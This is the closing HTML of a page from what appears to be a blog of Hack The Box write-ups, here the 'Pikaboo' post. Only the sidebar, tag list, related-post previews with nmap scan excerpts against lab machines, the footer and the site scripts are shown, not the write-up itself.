target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https://x00tex.github.io/posts/pikaboo/&amp;text=Hackthebox - Pikaboo - Poorduck" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/meta/">Hackthebox - Meta</a><li><a href="/posts/pandora/">Hackthebox - Pandora</a><li><a href="/posts/writer/">Hackthebox - Writer</a><li><a href="/posts/blunder/">Hackthebox - Blunder</a><li><a href="/posts/luanne/">Hackthebox - Luanne</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/command-injection/">command injection</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/file-upload/">file-upload</a> <a class="post-tag" href="/tags/rce/">rce</a> <a class="post-tag" href="/tags/ssrf/">ssrf</a> <a class="post-tag" href="/tags/ssti/">ssti</a> <a class="post-tag" href="/tags/aws/">aws</a> <a class="post-tag" href="/tags/awscli/">awscli</a> <a class="post-tag" href="/tags/dns/">dns</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/unicode/"><div class="card-body"> <em class="timeago small" data-ts="1638383400" > 2021-12-01 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox - Unicode</h3><div class="text-muted small"><p> Enumeration IP-ADDR: 10.10.11.126 hackmedia.htb nmap scan: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |...</p></div></div></a></div><div class="card"> <a href="/posts/tabby/"><div class="card-body"> <em class="timeago small" data-ts="1600021800" > 2020-09-13 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox - Tabby</h3><div class="text-muted small"><p> Scanning Nmap ports=$(nmap -Pn -p- --min-rate=1000 -T4 10.10.10.194 | grep open | awk -F / &#39;{print $1}&#39; ORS=&#39;,&#39;) echo $ports &amp;amp;&amp;amp; nmap -p$ports -sV -sC -v -T4 -oA scans/nmap.full 10...</p></div></div></a></div><div class="card"> <a href="/posts/monitors/"><div class="card-body"> <em class="timeago small" data-ts="1622399400" > 2021-05-30 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox - Monitors</h3><div class="text-muted small"><p> Enumeration IP-ADDR: 10.10.10.238 monitors.htb nmap scan: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/unicode/" class="btn btn-outline-primary" prompt="Older"><p>Hackthebox - Unicode</p></a> <a href="/posts/writer/" class="btn btn-outline-primary" prompt="Newer"><p>Hackthebox - Writer</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/p00rduck">p00rduck</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/command-injection/">command injection</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/file-upload/">file-upload</a> <a class="post-tag" href="/tags/rce/">rce</a> <a class="post-tag" href="/tags/ssrf/">ssrf</a> <a class="post-tag" href="/tags/ssti/">ssti</a> <a class="post-tag" href="/tags/aws/">aws</a> <a class="post-tag" href="/tags/awscli/">awscli</a> <a class="post-tag" href="/tags/dns/">dns</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
